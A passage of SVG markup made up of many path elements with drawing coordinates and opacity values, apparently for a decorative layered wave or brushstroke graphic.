18a5.3,5.3,0,0,1,1.31,4.43,5.08,5.08,0,0,1-3.59,2.81,45.42,45.42,0,0,1-10.16,0,7.44,7.44,0,0,1-4.27-2.35c-2.85-3.18-3.63-3.18-5.73,1.12-.32-1.48-.56-2.59-1-4.78l-5.06,7.23c-8.42-4.81-7.21-4.6-12.22.4-1.86-2.11-4.43-4.06-6.74-2-1.57,1.36-6.06.63-5.15,4.57h7a17.25,17.25,0,0,1,.21,3.11,29.4,29.4,0,0,1-.88,3.44,13.22,13.22,0,0,1-3.1-1.4c-1.86-1.49-3.39-1.28-5.13.2a2.66,2.66,0,0,1-2.33.28c-.43-.18-.58-1.34-.58-2.07,0-2,.15-3.93.24-5.9l-1.5-.44-4.38,5.54c.44,2.07.87,4.15,1.3,6.21-5.57,1.5-5.57,1.5-5.65,3.89,1.33-.18,2.63-.43,3.94-.51A35.87,35.87,0,0,0,628.92,64.11Zm31-43c-.86-.22-1.49-1.36-2.23-2.1.66-.59,1.27-1.59,2-1.67s1.46.81,2.2,1.27c.2.44.4.87.59,1.31C661.61,20.33,660.63,21.25,659.92,21.08Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M985,55.33c1.46-2.15,3-1.15,4.76-.44,5.9,2.42,12,3.57,18.34,2.29.65-.12,2,.4,2.1.83.72,3.42,3.4,3.9,6.1,4.17,6.63.67,13.45,2.49,19-3.39.76-.81,2.85-.92,4.13-.58,4.64,1.21,9.25,2.57,13.75,4.2s7.75.24,9.1-4.07a10.62,10.62,0,0,1,.93-1.83c1.5,2.4,2.88,4.59,4.67,7.46,2-2.3,3.74-4.51,5.69-6.53.87-.9,2.23-2,3.22-1.92s2.08,1.55,2.91,2.57,1,2.73,1.83,3c3.21,1,6.57,1.61,9.87,2.35.5-1.36,1-2.72,1.44-3.87l-9.51-3.68c.26-2.06,1.18-4.23.5-5-1.34-1.55-3.45-2.5-5.7-.66-.7.57-2.06.26-3.1.48-1.46.31-3.25.32-4.28,1.19-2.55,2.15-5.08,1.41-8.44.93l6-4.6-.54-1c-2.62.6-5.77-1.68-7.81,2.27a75.78,75.78,0,0,1-4.52,7l-5-4.48c-3.75.55-7.67.15-11.14,2.29-.61.38-1.7,0-2.58,0-2.43-.07-5.53-1.09-7.16,0-2.81,1.92-5,3.09-8.39,1.6-1.68-.74-3.94-.25-5.58-1-5.87-2.85-11.71-3.89-17.88-1.09-.41.18-1.15-.31-1.71-.55s-1.53-1.05-1.94-.85c-4.21,2.08-8.5-2.77-12.67.18-.17.13-.9-.23-1.14-.54-1.95-2.59-3.37-1.33-4.72.6,2.66,1.1,5.3,2.25,8,3.27A1.59,1.59,0,0,0,985,55.33Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M409.63,67.73c2.4.08,4.82-.07,7.23-.13a2.58,2.58,0,0,1,1.94-.47,8.4,8.4,0,0,0,1.4.43,4.27,4.27,0,0,1,1.22.21c3.68.44,7.7-.46,10.67,2.75.18.2.62.21,1,.25l17.24,2.13v3.48l11.92-2c5.85-1,10,3.53,15.15,4.94,3.69,1,6.73,1.89,10-.58,1.47-1.11,2.59-3.55,5-1.2.17.17,1.73-.58,2.1-1.21a40.76,40.76,0,0,0,2.08-4.91l-3.05-1.14-2,1.35-.95.4-.4,1c-.4.62-1,1.83-1.18,1.77-3.22-1.15-7.18.12-9.79-3l-3.3-.12c-.48,2.5-2.2,2.1-3.94,1.71A45.91,45.91,0,0,0,467,72.33c-2.9-.35-6.4.42-8.61-1-4.34-2.7-8.77-1.22-13.12-1.78-3.89-.5-8-.54-11.59-1.87-5.92-2.19-11.91-1.64-17.91-1.77-2.64,0-5.27,1.05-7.93,1.07A2.23,2.23,0,0,0,409.63,67.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M528.33,60,532,62.45l1-.27,2.73-2.76,2,2.1a1.43,1.43,0,0,0,.16.57c2,2.19,1.8,4.12-.66,6.21a1.48,1.48,0,0,0-.19.57c0,.71.06,1.42.08,2.13.91,0,2.15.29,2.65-.18,2.74-2.53,4.64-1.92,6.27,1.18a2,2,0,0,0,1.64.63c.48-.5,1.07-1.51.86-2-1-2.06.52-5.25-2.83-6.36-.17,0,.1-3.21.62-3.36,5.07-1.48,8.48-7.13,14.61-5.91.16,0,.45-.66.68-1l-.74-1.36.07-.12-3.44-.5-8.15,0-4.79.53c-.91,2.39-1.8,4.34-5.06,2.42A10.91,10.91,0,0,0,534,54c-3.57.08-6.12,2.92-5.72,6Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M797.9,16.16c4.54,1.39,4.73,1.71,3.73,5.93,5.87,2.82,12.19.84,19.09,1.15L818.5,19c-2,1.22-3.54,2.9-4.49,2.61-2-.6-3.28-2.38-2.1-4.74l.71.53,3.64-3.57c-4-2.19-8.21-1.74-12.42-.6-1.08.29-2.19.49-3.28.74V9.76l-4,.62v.69C797,12.75,794.67,15.18,797.9,16.16Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M898.68,32.93A23.5,23.5,0,0,1,905,36.22c2.23,1.52,4.15,3.79,7.08,1.3a1.55,1.55,0,0,1,1.24-.28c3.11,1,6.21,2.07,9.67,3.24a6.75,6.75,0,0,1,8.71,1.39c1.94,2.4,6.73,2.33,9.15-.14a9.88,9.88,0,0,0-2.6-1.37c-8.16-1.43-15.42-6.32-23.95-6.26-2,.87-3.89,1.8-5.89,2.54-.32.12-1.27-.57-1.38-1a2.27,2.27,0,0,1,.64-1.7,19.13,19.13,0,0,1,2.13-1.87l-.15-.16-2.89-.56a48.5,48.5,0,0,0-5.84-2.1,17.66,17.66,0,0,0-4.35.07C896.65,30.87,896.43,32.29,898.68,32.93Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M600.59,62l2.14-1.93.07.87c2.81.33,5.62.75,8.44.87.42,0,1.19-1.39,1.28-2.2a10,10,0,0,0-.53-2.94c-.68-.56-1.32-1.17-2-1.67-3.19-2.25-6.4-4.47-9.6-6.71l-1.28,0c0,.3,0,.59,0,.89l3.51,2.9C598.91,57,598.36,59.78,600.59,62Z\" transform=\"translate(0 0)\"\n opacity=\"0.1\"></path>\n <path d=\"M793.24,26.65a4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76-1.26-3.64-.74-7.86-5.65-8.65-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0A12.07,12.07,0,0,0,793.24,26.65Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M945.42,45.14a7.4,7.4,0,0,1,2.3.36c4.19,1,8.38,2,12.55,3,1.46.37,3.3.56,4.23,1.54,2.66,2.8,5.85,2.55,9.14,2.33-3.18-1.55-6.24-3.5-9.58-4.56-4.33-1.36-8.92-1.9-13.34-3-2.63-.66-5.17-1.72-7.75-2.59C942.68,44.16,943.16,45.34,945.42,45.14Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M705.23,41.47c.24,1,.49,2,.74,3,1.37.31,2.73.68,4.11.92a2.43,2.43,0,0,0,1.77-.14,2.19,2.19,0,0,0,.6-1.77C712.08,41.86,706.69,40.44,705.23,41.47Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M566.9,62.85l4.09-.37c0-.65,0-1.31.08-2l-3.93-.7Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M566.48,55.5c.88-.51,1.75-1,2.62-1.55,0-.33,0-.66,0-1l-2.67-.39h-.72l-1.25.23-.81,1.24C564,55.73,564.79,56.48,566.48,55.5Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.72,28.77c2.09-.33,4.87.74,5.44-2.68l-2.07-.77-3.41,3.4,0,0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M402,64.38a12,12,0,0,0-3.8-.12l3.72,1.19C401.88,65.09,401.91,64.73,402,64.38Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.65,70.75l.94,2.17,1.85-1.85-1.39-.76Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1092.16,55.67c.14-.05.18-.35.26-.54l-.57-.24c-.08.19-.27.42-.21.56A.55.55,0,0,0,1092.16,55.67Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M18.44,71.94A8.27,8.27,0,0,0,18,71c-3.4-.93-11.69-5.11-18-8v6.54C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M19.56,70.79a2.81,2.81,0,0,1,1.29-2.4c3.26-1.37,7-2,9.89-3.8,3.33-2.12,6-4.61,8.93.21.19.31,1.5-.08,2.3-.14a11.13,11.13,0,0,0-.78-2.49A13.83,13.83,0,0,0,39.1,60c2-.16,3.6.18,4.53-.44,3.66-2.47,7.56-2.39,11.66-1.88.84.11,1.77-.56,2.67-.87A66.19,66.19,0,0,0,49.7,56c-2.08,0-4.12,1.07-6.22,1.3C35,58.2,26.47,59,18,59.82L13.3,64.15l.6,1.25C15.24,67.29,17,69,18,71,19.1,71.33,19.69,71.3,19.56,70.79Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M66.23,56.25c2.09.74,3.41.14,4.79-1.32a8.11,8.11,0,0,1,2.36-1.45c1.93,2.9,4,.68,6,0,.73,4.47,3.79,5.76,8.55,3.67l-2.66-3.47c2.36-.27,4.3,0,5.56-.73,3.88-2.43,7.67-1.82,11.69-.68.89.25,2.06-.52,3.11-.82L94,49.77q-8.62,1.41-17.24,2.8a2,2,0,0,1-1-.2,5.37,5.37,0,0,0-6.17,1.43,3.11,3.11,0,0,1-2.58.66,7.68,7.68,0,0,0-7.71,2.11c1,0,2,0,3-.06C63.62,56.43,65.09,55.85,66.23,56.25Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path 